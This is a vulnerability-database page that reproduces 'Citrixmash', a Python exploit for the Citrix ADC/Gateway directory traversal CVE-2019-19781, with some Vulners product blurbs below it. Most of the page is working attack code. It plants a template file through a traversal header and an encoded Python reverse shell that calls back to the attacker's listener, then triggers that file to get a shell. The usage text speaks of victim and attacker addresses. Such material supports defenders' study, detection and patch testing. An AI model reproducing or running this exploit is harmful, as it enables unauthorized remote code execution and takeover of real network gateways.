Lucene search
K

Citrix Application Delivery Controller / Gateway Remote Code Execution / Traversal

🗓️ 11 Jan 2020 00:00:00Reported by David KennedyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 235 Views

Exploit Citrix Directory Traversal Bug: CVE-2019-19781, RCE using application delivery controlle

Related
Code
`#!/usr/bin/python3  
#  
# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781  
#  
# You only need a listener like netcat to catch the shell.  
#  
# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White  
#  
# Tool Written by: Rob Simon and David Kennedy  
  
import requests  
import urllib3  
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings  
import random  
import string  
import time  
from random import randint  
import argparse  
import sys  
  
# random string generator  
def randomString(stringLength=10):  
letters = string.ascii_lowercase  
return ''.join(random.choice(letters) for i in range(stringLength))  
  
# our random string for filename - will leave artifacts on system  
filename = randomString()  
randomuser = randomString()  
  
# generate random number for the nonce  
nonce = randint(5, 15)   
  
# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script  
# note that the file location will be in /netscaler/portal/templates/filename.xml  
def stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport):  
  
# encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC)  
encoded = ""  
i=0  
text = ("""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""" % (attackerip, attackerport))  
while i < len(text):  
encoded = encoded + "chr("+str(ord(text[i]))+") . "  
i += 1  
encoded = encoded[:-3]  
payload="[% template.new({'BLOCK'='print readpipe(" + encoded + ")'})%]"  
headers = (   
{  
'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',  
'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),  
'NSC_NONCE' : '%s' % (nonce),  
})  
  
data = (  
{  
"url" : "127.0.0.1",  
"title" : payload,  
"desc" : "desc",  
"UI_inuse" : "a"  
})  
  
url = ("https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl" % (victimip, victimport))  
requests.post(url, data=data, headers=headers, verify=False)  
  
# this is our second stage that triggers the exploit for us  
def stage2(filename, randomuser, nonce, victimip, victimport):  
headers = (  
{  
'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',  
'NSC_USER' : '%s' % (randomuser),  
'NSC_NONCE' : '%s' % (nonce),  
})  
  
requests.get("https://%s:%s/vpn/../vpns/portal/%s.xml" % (victimip, victimport, filename), headers=headers, verify=False)  
  
  
# start our main code to execute  
print('''  
  
.o oOOOOOOOo OOOo  
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO  
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO  
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'  
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo  
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO  
OOOOO '"OOOOOOOOOOOOOOOO"` oOO  
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.  
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO  
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO  
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"  
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`  
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .  
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo  
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':  
`$" `OOOO' `O"Y ' `OOOO' o .  
. . OP" : o .  
:  
  
Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781  
Tool Written by: Rob Simon and Dave Kennedy  
Contributions: The TrustedSec Team   
Website: https://www.trustedsec.com  
INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/  
  
This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used  
to append files in an XML format to the victim machine. This in turn allows for remote code execution.  
  
Be sure to cleanup these two file locations:  
/var/tmp/netscaler/portal/templates/  
/netscaler/portal/templates/  
  
Usage:  
  
python citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\n''')  
  
# parse our commands  
parser = argparse.ArgumentParser()  
parser.add_argument("target", help="the vulnerable server with Citrix (defaults https)")  
parser.add_argument("targetport", help="the target server web port (normally on 443)")  
parser.add_argument("attackerip", help="the attackers reverse listener IP address")  
parser.add_argument("attackerport", help="the attackersa reverse listener port")  
args = parser.parse_args()  
print("[*] Firing STAGE1 POST request to create the XML template exploit to disk...")  
print("[*] Saving filename as %s.xml on the victim machine..." % (filename))  
# trigger our first post  
stage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport)  
print("[*] Sleeping for 2 seconds to ensure file is written before we call it...")  
time.sleep(2)  
print("[*] Triggering GET request for the newly created file with a listener waiting...")  
print("[*] Shell should now be in your listener... enjoy. Keep this window open..")  
print("[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/")  
# trigger our second post  
stage2(filename, randomuser, nonce, args.target, args.targetport)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Jan 2020 00:00Current
1Low risk
Vulners AI Score1
EPSS0.99999
235